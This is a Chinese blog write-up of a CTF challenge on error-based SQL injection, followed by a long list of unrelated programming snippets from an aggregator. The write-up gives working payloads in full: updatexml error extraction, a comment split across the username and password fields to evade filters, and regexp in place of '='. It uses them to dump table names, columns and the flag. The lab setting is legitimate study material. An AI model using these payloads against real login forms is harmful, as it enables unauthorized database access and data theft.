帅猪佩奇
帅猪佩奇

报错注入

HTTP分割注入 

题目地址实验吧:加了料的报错注入。

地址:http://ctf5.shiyanbar.com/web/baocuo/index.php

查看页面源代码,给出了我们sql查询语句很常规

    

根据提示 post传一个username和password然后开始注入

语句:

    username=admin' or '&password=admin

显示 You are our member, welcome to enter,可以说明单引号空格没有被过滤,不过既然是报错注入,那么加个单引号试试。

语句:

    username=admin'&password=admin

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1

接下来写报错语句

语句:

    username=admin'and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '&password=admin

一翻测试之后发现,有个神奇的过滤,username过滤了(),password过滤了一切报错函数。

可以组合一下。username写函数updatexml。password写(),但是怎么合并为一起呢,想到sql语句是

select * from users where username='$username' and password='$password

$username=updatexm/*,$password=*/...这样sql语句会变成

    select * from users where username='updatexm/* and password='*/...

这样便可以注释掉中间的代码一种骚姿势,接下来继续正常注入。

    username=' and updatexml/*&password=*/(1,concat(0x7e,(select database()),0x7e),1) or '

成功爆出来数据库名称。

语句

    username=' and updatexml/*&password=*/(1,concat(0x7e,(select table_name from information_schema.tables where table_schema ='error_based_hpf'),0x7e),1) or '

等于号被过滤,可以使用正则注入,也就是=换成regexp

    username=' and updatexml/*&password=*/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema regexp'error_based_hpf'),0x7e),1) or '

这里使用group_concat来爆出所有的表名字

    XPATH syntax error: '~ffll44jj,users~'

查列

    username=' and updatexml/*&password=*/(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name regexp'ffll44jj'),0x7e),1) or '

    XPATH syntax error: '~value~'

查数据

    username=' and updatexml/*&password=*/(1,concat(0x7e,(select value from 

    ffll44jj),0x7e),1) or '

    XPATH syntax error: '~flag{err0r_b4sed_sqli_+_hpf}~'

如果flag超过32位,可以mid截断来查询。不过本题中是禁止了mid函数的不过也不超过32位可以直接获取flag。

你可能感兴趣的:(报错注入)

  • 数据分析:低代码平台助力大数据时代的飞跃发展 快乐非自愿 数据分析低代码大数据
    随着信息技术的突飞猛进,我们身处于一个数据量空前增长的时代——大数据时代。在这个时代背景下,数据分析已经成为企业决策、政策制定、科学研究等众多领域不可或缺的重要工具。然而,面对海量的数据和日益复杂多变的分析需求,传统的数据分析方法往往捉襟见肘,难以应对。幸运的是,低代码平台的兴起为大数据分析注入了新的活力,成为推动大数据时代发展的重要力量。低代码平台,顾名思义,是一种通过少量甚至无需编写代码,就能
  • eclipse导入项目 warning报错 org.springframework.ide.eclipse.core.springnature zhangfeng1133 ideeclipsejava
    报错org.springframework.ide.eclipse.core.springnature报错信息"org.springframework.ide.eclipse.core.springnature"通常表示EclipseIDE中与Spring框架集成的插件出现了问题。这个错误可能是因为SpringIDE插件没有正确安装或配置,或者Eclipse的更新过程中出现了问题。解决方法:确认S
  • Python Flask 使用数据库 安果移不动 pythonflask开发语言
    pipinstallflask_sqlalchemy官方文档:Flask-SQLAlchemy—Flask-SQLAlchemyDocumentation(3.1.x)为了不报错也需要导入另外两个库#pipinstallflask_sqlalchemy#pipinstallmysqlclient完整代码importosfromflaskimportFlaskfromflask_sqlalchemy
  • 若依框架集成seata分布式事务的一些幺蛾子 半山惊竹 分布式
    一、bug连环炮A服务调用B服务,B服务异常,A服务插入的数据没有回退,前面没有思路,就查了下,说是没有切换为seata的数据源,我就在启动类加了一个@EnableAutoDataSourceProxy注解,结果就开始报错了:2024-03-1910:49:30.653[http-nio-8080-exec-2]INFOc.a.n.client.config.impl.CacheData-Line
  • 【Linux】PyCharm无法启动报错及解决方法 不是AI python软件操作Linuxlinuxpycharm运维
    一、问题描述如图,笔者试图在Ubuntu18.04虚拟机上运行PyCharm开发工具(已安装,安装过程可以参考我的博客Ubuntu安装PyCharm),无法启动,报错:CannotconnecttoalreadyrunningIDEinstance.Exception:Process2574isstillrunning.报错截图如下:二、解决方法通过报错信息看出,出于某种原因,进程(PID为257
  • opencv “未声明的标识符:SurfFeatureDetector”问题解决办法 adsdriver Opencv学习点滴opencv特征点检测未声明的标识符SurfFeaturDetector
    在VS中使用opencv2.4.X版本的时候,如果使用SurfFeatureDetector(或者SiftFeatureDetector)做特征点检测的时候,按照官方文档上的示例代码include头文件为:opencv2/features2d/features2d.hpp,则会出现如下报错:errorC2065:“SurfFeatureDetector”:未声明的标识符。1、实际上2.4.X版本的
  • Ubuntu中安装VSCode的一个指令 Trigger_G Ubuntu与ROSubuntuvscodelinux
    问题描述本来想去VSCode官网上下载软件包,然后双击使用UbuntuSoftware安装的,但是安装老不成功。想用命令行指令dpkg进行安装,虽然能成功,但是后续使用code.命令打开VSCode又报错说找不到命令。解决方式在命令行中使用下述命令安装VSCode。sudosnapinstall--classiccode(建议安装的时候连上手机的热点,不然会报连接不上下载站点相关的错误)
  • 华为广告打包报错,问题思考 学知识拯救世界 android华为
    华为广告打包时报错fata日志不一样能反映出完整的错误日志信息,仅看fata日志具有误导性,有可能指向错误的方向。通过看完整的日志可见,错误的原因为Causedby:java.lang.ClassNotFoundException:com.huawei.hms.ads.base.R$dimenfata日志2024-03-2520:24:27.6743737-3737AndroidRuntimeus
  • 福建科立讯通信 指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621) OidBoy_G 漏洞复现安全web安全
    0x01产品简介福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。0x02漏洞概述福建科立讯通信指挥调度管理平台down_fil
  • Prompts(一) george_xu4 大模型prompt
    提示工程提示工程(PromptEngineering)是一门较新的学科,关注提示词开发和优化,帮助用户将大语言模型(LargeLanguageModel,LLM)用于各场景和研究领域。掌握了它的奥秘,你便能洞悉LLM的无限潜能与潜在限制,从而更好地驾驭它。研究人员运用提示工程的魔力,为LLM注入了处理复杂任务场景的新活力。问答、算术推理,这些曾让LLM头疼不已的挑战,如今在精心设计的提示词引导下,
  • uniapp 开发微信小程序 出现启用组件按需注入问题如何解决 古猿写代码 uniappuni-app微信小程序小程序
    问题描述在使用uniapp开发微信小程序,进行上架发布时代码质量栏出现启用组件按需注入问题。虽然现实代码上传成功,但是作为一个吹毛求疵的老猿人,肯定是无法容忍的。那么如何解决呢?问题解决方案在uniapp端,特别注意不是在微信开发工具端,找到unpackage包,在下面找到app.json文件。在app.json文件中,加入一下代码://解决启用组件按需注入问题"lazyCodeLoading":
  • 关于yeoman报错:requires yeoman-environment at least 3.0.0-beta.1解决方案 KK_boy
    最近在学习yeoman的使用,在运行创建自定义generator的命令时候遇到一个问题yo2021022221365862.png解决办法将yeoman-generator的版本降到4.0或者全局安装yeoman-environment,并且使用yorun————————————————版权声明:本文为CSDN博主「Mr.M先生」的原创文章,遵循CC4.0BY-SA版权协议,转载请附上原文出处链接
  • 网页有效防止XSS,SQL注入,木马文件拦截上传等安全问题 程序员贵哥 网络安全xsssql安全网络安全web安全php
    网络安全问题一直是备受关注的话题,其中跨站脚本攻击(XSS)、SQL注入和木马文件上传是常见的安全威胁。下面我将详细介绍这些安全问题。首先是跨站脚本攻击(XSS)。XSS攻击是一种利用网站漏洞,将恶意脚本注入到用户浏览器中并执行的攻击方式。攻击者可以在网站中插入恶意脚本,当用户浏览该网站时,恶意脚本会被执行,从而窃取用户的敏感信息或执行其他恶意操作。XSS攻击可以分为反射型、存储型和DOM-bas
  • MongoDB聚合运算符:$indexOfBytes 原子星 mongodbmongodb数据库
    文章目录语法使用举例$聚合运算符在字符串中搜索子字符串的出现位置并返回第一次出现的UTF-8字节索引(从零开始)。如果未找到子字符串,则返回-1。语法{$indexOfBytes:[,,,]}参数说明:参数说明字符串表达式,如果表达式的值为null或应用的字段缺失,则返回null;如果表达式的值不为字符串、null、或字段缺失,则报错要搜索的字符串,可以是任何可解析为字符串的表达式可选参数,可解析
  • vue项目报错,npm install 报错 m87里的光 vue.jsnpm前端
    1.报错问题:npmERR!cb()nevercalled!npmERR!Thisisanerrorwithnpmitself.Pleasereportthiserrorat:npmERR!9npmERR!Acompletelogofthisruncanbefoundin:npmERR!C:\Users\AdministratorAppDataRoamingnpm-cachelogs2020-12
  • WordPress Plugin NotificationX插件 SQL注入漏洞复现(CVE-2024-1698) OidBoy_G 漏洞复现sqlweb安全安全
    0x01产品简介WordPress和WordPressplugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。0x02漏洞概述WordPresspluginNotificationX是一个应用插件。2.8.2版本及之前存在安全漏洞,该漏洞源于对用户提供的参数转义不充分以及对现有SQL查询缺乏充分
  • 代码随想录算法训练营DAY4| C++|LeetCode|24.两两交换链表中的结点、19.删除链表的倒数第N个结点、面试题 02.07. 链表相交、142.环形链表II Che3rry 算法c++
    文章目录24.两两交换链表中的结点主要思路cpp代码19.删除链表的倒数第N个结点主要思路CPP代码面试题02.07.链表相交基本思路CPP代码142.环形链表II主要思路CPP代码24.两两交换链表中的结点力扣题目链接文章链接:24.两两交换链表中的结点视频链接:帮你把链表细节学清楚!|LeetCode:24.两两交换链表中的节点状态:第一次提交报错RE,主要原因在于循环条件没把握好。对空指针尽
  • 05. spring-boot对spring-mvc的自动配置 马晓钧
    spring-mvc的自动配置viewResolver:视图解析器:根据方法的返回值得到视图对象(View)。//会将容器中已有的ViewResolver和自己定义的ViewResolver全部add进去ContentNegotiatingViewResolver自定义视图解析器://需要实现ViewResolver,并注入进容器@ConfigurationpublicclassViewConfi
  • cmake 报错: could not open ‘kernel32.lib‘: no such file or directory meluobote 环境配置c++
    首次用helloworld想配置cmake。powershell下执行cmake..-G"MinGWMakefiles"报的这个错。因为查到这个库是windows下的,于是想着换成Unix试下。执行:cmake..-G"UnixMakefiles"成功cmake版本:cmakeversion3.29.0-rc2CMakesuitemaintainedandsupportedbyKitware(ki
  • chatGLM-6B部署报错quantization_kernels_parallel.so‘ (or one of its dependencies). Try using the full pat FL1623863129 环境配置深度学习
    用python部署chatglm2时候报错:FileNotFoundError:Couldnotfindmodule'C:\Users\Administrator\.cache\huggingface\modules\transformers_modules\chatglm2-6b-int4\quantization_kernels_parallel.so'(oroneofitsdependenc
  • pyflink1.18.0 报错 TypeError: cannot pickle ‘_thread.lock‘ object Thomas2143 总结pyflink
    完整报错Traceback(mostrecentcalllast):File"/Users//1.py",line851,inds1=my_datastream.key_by(lambdax:x[0]).process(MyProcessFunction())#返回元组即:f0f1f2三列File"/Users/thomas990p/bigdataSoft/minicondaarm/minicon
  • 性格即命运——从研究生毒杀室友案看人性的弱点 孤独的杨树
    轰动一时的研究生毒杀室友案转眼已经过去了将近五年。今日之所以旧事重提,是因为这件事是对“性格即命运”的很好诠释。认清自己性格中的弱点,并加以改进,避免悲剧,这是一个永不过时的话题。事情现在描述起来并不复杂,一个姓林的研究生因为生活琐事用实验室用的有毒试剂注入寝室的饮水机,毒死了同宿舍的黄姓同学。究竟是什么样的生活琐事导致事件的发生?据媒体报道:南方周末记者从可靠渠道了解到,林与黄洋及另一位室友葛林
  • 摘抄好句第16天:《用心做事》做自己人生的摆渡人 栩可98女性成长
    1、将心注入——有多少心就会做多少事:责任心(不把问题推给别人)、忠心(把忠诚刻在心上)、恒心(咬定目标不放松)、进取心(用心做事的推动力)、热心(用心做事的有效方法)、信心(用心做事的原动力)、感恩心(用心做事的健康心态)。2、用心做事:清晰明白(如何做、目的、目标、内容、途径)、善于思考的智者、付诸行劝绝不拖延、把学习时刻进行到底、用心规划人生许自己一个明天。3、用心做事:有了积极主动,乐观向
  • torch报错:[winerror 126] 找不到指定的模块torch_python.dll“ or one of its dependencies. LightningJie 深度学习pythonpytorch
    [winerror126]找不到指定的模块。errorloading"d:\miniconda\envs\action_env\lib\site-packages\torch\lib\torch_python.dll"oroneofitsdependencies.在使用这个yolov5模块的时候发现了这个错误,错误原因是因为python版本和torch版本冲突。本人安装torch的python版本
  • Spring Boot Demo with Docker 亨利何
    1.Springstarter启动一个web项目基本操作可参考:感谢这个链接Note:Controller&Mapping类似于Route2.Springmavenpackage生成可执行jar包mavenpackage报错:相比于jdk你是不是运行在jre上?需要mavenpom.xml配置compile和jdk相匹配org.apache.maven.pluginsmaven-compiler-
  • 看见光,追逐光,成为光~ 默涵在当下
    高屋建瓴的人,散发着高贵气质,周遭牛人很多,咬紧他们~杜总,从看网知网背景出发,讲到发现流量痛点,讲到站点布局,讲到下一步机会,从而又契合到自动驾驶网络。从如何构建五级驾驶,到如何结合现状落地~研究字节跳动对神经网络的改造,注入人的干预分类,优化再到聚类,让算法匹配人的干预能力~基础操作效能提升达到90%,告警防护率达到90%,两者交叉防护有效率达到多少?99%一切皆可AI~一切皆可AI~优秀自觉
  • Spring(概念) lvpflv spring源码springpythonjava
    1、企业级应用Spring之所以称为容器,就是由于BeanFactory的自动装配和注入Spring3开始把jar拆分成了多个:spring2及Spring2之前只有一个jar包2、SpringIOC简介和环境搭建责任链缺点:层与层之间的相互调用造成了耦合性比较高解决方案:SpringIOC控制反转项目应用场景、帮助创建SqlSessionFactory、管理所有Mapper接口,管理所有Serv
  • 面向对象设计之依赖反转原则 流星雨爱编程 #设计模式/架构设计java开发语言设计模式c++
    设计模式专栏:http://t.csdnimg.cn/4Mt4u目录1.引言2.控制反转(loC)3.依赖注入(DI)4.依赖注入框架(DlFramework)5.依赖反转原则(DIP)6.总结1.引言前面讲到,单一职责原则和开闭原则的原理比较简单,但在实践中用好比较难,而本节要讲的依赖反转原则正好相反。依赖反转原则的使用简单,但理解较难。在进行详细介绍之前,读者可以尝试回答下列向题。1)“依赖反
  • qt 使用有参数的信号和槽 zhuyua qt开发语言
    必须使用函数指针,否者报错未带参数的可以不用函数指针也可以用例子:使用函数指针调用带参数信号和槽void(Teacher::*teacherSignal)(QString)=&Teacher::hungry;void(Student::*studentSignal)(QString)=&Student::treat;connect(bhw,teacherSignal,twh,studentSign
  • Plugin ‘org.springframework.boot:spring-boot-maven-plugin:‘ not found Shipley Leo 常见报错问题mavenjavaspring
    文章目录一、报错问题二、问题背景三、原因分析四、解决方案一、报错问题Plugin‘org.springframework.boot:spring-boot-maven-plugin:‘notfound二、问题背景pom.xml文件的配置情况,如下所示:org.springframework.bootspring-boot-maven-pluginMaven仓库中存在多个版本的spring-boot
  • Java开发中,spring mvc 的线程怎么调用? 小麦麦子 springmvc
    今天逛知乎,看到最近很多人都在问spring mvc 的线程http://www.maiziedu.com/course/java/ 的启动问题,觉得挺有意思的,那哥们儿问的也听仔细,下面的回答也很详尽,分享出来,希望遇对遇到类似问题的Java开发程序猿有所帮助。 问题:     在用spring mvc架构的网站上,设一线程在虚拟机启动时运行,线程里有一全局
  • maven依赖范围 bitcarter maven
    1.test 测试的时候才会依赖,编译和打包不依赖,如junit不被打包 2.compile 只有编译和打包时才会依赖 3.provided 编译和测试的时候依赖,打包不依赖,如:tomcat的一些公用jar包 4.runtime 运行时依赖,编译不依赖 5.默认compile 依赖范围compile是支持传递的,test不支持传递 1.传递的意思是项目A,引用
  • Jaxb org.xml.sax.saxparseexception : premature end of file darrenzhu xmlprematureJAXB
    如果在使用JAXB把xml文件unmarshal成vo(XSD自动生成的vo)时碰到如下错误: org.xml.sax.saxparseexception : premature end of file 很有可能时你直接读取文件为inputstream,然后将inputstream作为构建unmarshal需要的source参数。InputSource inputSource = new In
  • CSS Specificity 周凡杨 html权重Specificitycss
      有时候对于页面元素设置了样式,可为什么页面的显示没有匹配上呢? because specificity CSS 的选择符是有权重的,当不同的选择符的样式设置有冲突时,浏览器会采用权重高的选择符设置的样式。     规则:   HTML标签的权重是1 Class 的权重是10 Id 的权重是100
  • java与servlet g21121 servlet
    servlet 搞java web开发的人一定不会陌生,而且大家还会时常用到它。 下面是java官方网站上对servlet的介绍: java官网对于servlet的解释 写道 Java Servlet Technology Overview Servlets are the Java platform technology of choice for extending and enha
  • eclipse中安装maven插件 510888780 eclipsemaven
    1.首先去官网下载 Maven: http://www.apache.org/dyn/closer.cgi/maven/binaries/apache-maven-3.2.3-bin.tar.gz 下载完成之后将其解压, 我将解压后的文件夹:apache-maven-3.2.3, 并将它放在 D:\tools目录下, 即 maven 最终的路径是:D:\tools\apache-mave
  • jpa@OneToOne关联关系 布衣凌宇 jpa
    Nruser里的pruserid关联到Pruser的主键id,实现对一个表的增删改,另一个表的数据随之增删改。 Nruser实体类 //***************************************************************** @Entity @Table(name="nruser") @DynamicInsert @Dynam
  • 我的spring学习笔记11-Spring中关于声明式事务的配置 aijuans spring事务配置
    这两天学到事务管理这一块,结合到之前的terasoluna框架,觉得书本上讲的还是简单阿。我就把我从书本上学到的再结合实际的项目以及网上看到的一些内容,对声明式事务管理做个整理吧。我看得Spring in Action第二版中只提到了用TransactionProxyFactoryBean和<tx:advice/>,定义注释驱动这三种,我承认后两种的内容很好,很强大。但是实际的项目当中
  • java 动态代理简单实现 antlove javahandlerproxydynamicservice
    dynamicproxy.service.HelloService package dynamicproxy.service; public interface HelloService { public void sayHello(); }   dynamicproxy.service.impl.HelloServiceImpl package dynamicp
  • JDBC连接数据库 百合不是茶 JDBC编程JAVA操作oracle数据库
             如果我们要想连接oracle公司的数据库,就要首先下载oralce公司的驱动程序,将这个驱动程序的jar包导入到我们工程中;   JDBC链接数据库的代码和固定写法;     1,加载oracle数据库的驱动;     &nb
  • 单例模式中的多线程分析 bijian1013 javathread多线程java多线程
    谈到单例模式,我们立马会想到饿汉式和懒汉式加载,所谓饿汉式就是在创建类时就创建好了实例,懒汉式在获取实例时才去创建实例,即延迟加载。 饿汉式: package com.bijian.study; public class Singleton { private Singleton() { } // 注意这是private 只供内部调用 private static
  • javascript读取和修改原型特别需要注意原型的读写不具有对等性 bijian1013 JavaScriptprototype
            对于从原型对象继承而来的成员,其读和写具有内在的不对等性。比如有一个对象A,假设它的原型对象是B,B的原型对象是null。如果我们需要读取A对象的name属性值,那么JS会优先在A中查找,如果找到了name属性那么就返回;如果A中没有name属性,那么就到原型B中查找name,如果找到了就返回;如果原型B中也没有
  • 【持久化框架MyBatis3六】MyBatis3集成第三方DataSource bit1129 dataSource
    MyBatis内置了数据源的支持,如:   <environments default="development"> <environment id="development"> <transactionManager type="JDBC" /> <data
  • 我程序中用到的urldecode和base64decode,MD5 bitcarter cMD5base64decodeurldecode
    这里是base64decode和urldecode,Md5在附件中。因为我是在后台所以需要解码: string Base64Decode(const char* Data,int DataByte,int& OutByte) { //解码表 const char DecodeTable[] = { 0, 0, 0, 0, 0, 0
  • 腾讯资深运维专家周小军:QQ与微信架构的惊天秘密 ronin47
    社交领域一直是互联网创业的大热门,从PC到移动端,从OICQ、MSN到QQ。到了移动互联网时代,社交领域应用开始彻底爆发,直奔黄金期。腾讯在过去几年里,社交平台更是火到爆,QQ和微信坐拥几亿的粉丝,QQ空间和朋友圈各种刷屏,写心得,晒照片,秀视频,那么谁来为企鹅保驾护航呢?支撑QQ和微信海量数据背后的架构又有哪些惊天内幕呢?本期大讲堂的内容来自今年2月份ChinaUnix对腾讯社交网络运营服务中心
  • java-69-旋转数组的最小元素。把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。输入一个排好序的数组的一个旋转,输出旋转数组的最小元素 bylijinnan java
    public class MinOfShiftedArray { /** * Q69 旋转数组的最小元素 * 把一个数组最开始的若干个元素搬到数组的末尾,我们称之为数组的旋转。输入一个排好序的数组的一个旋转,输出旋转数组的最小元素。 * 例如数组{3, 4, 5, 1, 2}为{1, 2, 3, 4, 5}的一个旋转,该数组的最小值为1。 */ publ
  • 看博客,应该是有方向的 Cb123456 反省看博客
    看博客,应该是有方向的:  我现在就复习以前的,在补补以前不会的,现在还不会的,同时完善完善项目,也看看别人的博客.  我刚突然想到的:  1.应该看计算机组成原理,数据结构,一些算法,还有关于android,java的。  2.对于我,也快大四了,看一些职业规划的,以及一些学习的经验,看看别人的工作总结的.    为什么要写
  • [开源与商业]做开源项目的人生活上一定要朴素,尽量减少对官方和商业体系的依赖 comsci 开源项目
         为什么这样说呢?  因为科学和技术的发展有时候需要一个平缓和长期的积累过程,但是行政和商业体系本身充满各种不稳定性和不确定性,如果你希望长期从事某个科研项目,但是却又必须依赖于某种行政和商业体系,那其中的过程必定充满各种风险。。。       所以,为避免这种不确定性风险,我
  • 一个 sql优化 ([精华] 一个查询优化的分析调整全过程!很值得一看 ) cwqcwqmax9 sql
    见   http://www.itpub.net/forum.php?mod=viewthread&tid=239011 Web翻页优化实例 提交时间: 2004-6-18 15:37:49      回复    发消息  环境: Linux ve
  • Hibernat and Ibatis dashuaifu Hibernateibatis
    Hibernate  VS  iBATIS 简介 Hibernate 是当前最流行的O/R mapping框架,当前版本是3.05。它出身于sf.net,现在已经成为Jboss的一部分了 iBATIS 是另外一种优秀的O/R mapping框架,当前版本是2.0。目前属于apache的一个子项目了。 相对Hibernate“O/R”而言,iBATIS 是一种“Sql Mappi
  • 备份MYSQL脚本 dcj3sjt126com mysql
    #!/bin/sh # this shell to backup mysql #[email protected] (QQ:1413161683 DuChengJiu) _dbDir=/var/lib/mysql/ _today=`date +%w` _bakDir=/usr/backup/$_today [ ! -d $_bakDir ] && mkdir -p
  • iOS第三方开源库的吐槽和备忘 dcj3sjt126com ios
    转自 ibireme的博客   做iOS开发总会接触到一些第三方库,这里整理一下,做一些吐槽。   目前比较活跃的社区仍旧是Github,除此以外也有一些不错的库散落在Google Code、SourceForge等地方。由于Github社区太过主流,这里主要介绍一下Github里面流行的iOS库。   首先整理了一份 Github上排名靠
  • html wlwmanifest.xml eoems htmlxml
    所谓优化wp_head()就是把从wp_head中移除不需要元素,同时也可以加快速度。 步骤: 加入到function.php remove_action('wp_head', 'wp_generator'); //wp-generator移除wordpress的版本号,本身blog的版本号没什么意义,但是如果让恶意玩家看到,可能会用官网公布的漏洞攻击blog remov
  • 浅谈Java定时器发展 hacksin java并发timer定时器
    java在jdk1.3中推出了定时器类Timer,而后在jdk1.5后由Dou Lea从新开发出了支持多线程的ScheduleThreadPoolExecutor,从后者的表现来看,可以考虑完全替代Timer了。 Timer与ScheduleThreadPoolExecutor对比: 1.    Timer始于jdk1.3,其原理是利用一个TimerTask数组当作队列
  • 移动端页面侧边导航滑入效果 ini jqueryWebhtml5cssjavascirpt
    效果体验:http://hovertree.com/texiao/mobile/2.htm可以使用移动设备浏览器查看效果。效果使用到jquery-2.1.4.min.js,该版本的jQuery库是用于支持HTML5的浏览器上,不再兼容IE8以前的浏览器,现在移动端浏览器一般都支持HTML5,所以使用该jQuery没问题。HTML文件代码: <!DOCTYPE html> <h
  • AspectJ+Javasist记录日志 kane_xie aspectjjavasist
    在项目中碰到这样一个需求,对一个服务类的每一个方法,在方法开始和结束的时候分别记录一条日志,内容包括方法名,参数名+参数值以及方法执行的时间。   @Override public String get(String key) { // long start = System.currentTimeMillis(); // System.out.println("Be
  • redis学习笔记 MJC410621 redisNoSQL
    1)nosql数据库主要由以下特点:非关系型的、分布式的、开源的、水平可扩展的。 1,处理超大量的数据 2,运行在便宜的PC服务器集群上, 3,击碎了性能瓶颈。 1)对数据高并发读写。 2)对海量数据的高效率存储和访问。 3)对数据的高扩展性和高可用性。 redis支持的类型: Sring 类型 set name lijie get name lijie set na
  • 使用redis实现分布式锁 qifeifei
    在多节点的系统中,如何实现分布式锁机制,其中用redis来实现是很好的方法之一,我们先来看一下jedis包中,有个类名BinaryJedis,它有个方法如下:   public Long setnx(final byte[] key, final byte[] value) { checkIsInMulti(); client.setnx(key, value); ret
  • BI并非万能,中层业务管理报表要另辟蹊径 张老师的菜 大数据BI商业智能信息化
           BI是商业智能的缩写,是可以帮助企业做出明智的业务经营决策的工具,其数据来源于各个业务系统,如ERP、CRM、SCM、进销存、HER、OA等。        BI系统不同于传统的管理信息系统,他号称是一个整体应用的解决方案,是融入管理思想的强大系统:有着系统整体的设计思想,支持对所有
  • 安装rvm后出现rvm not a function 或者ruby -v后提示没安装ruby的问题 wudixiaotie function
    1.在~/.bashrc最后加入 [[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm"  2.重新启动terminal输入:   rvm use ruby-2.2.1 --default  把当前安装的ruby版本设为默
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他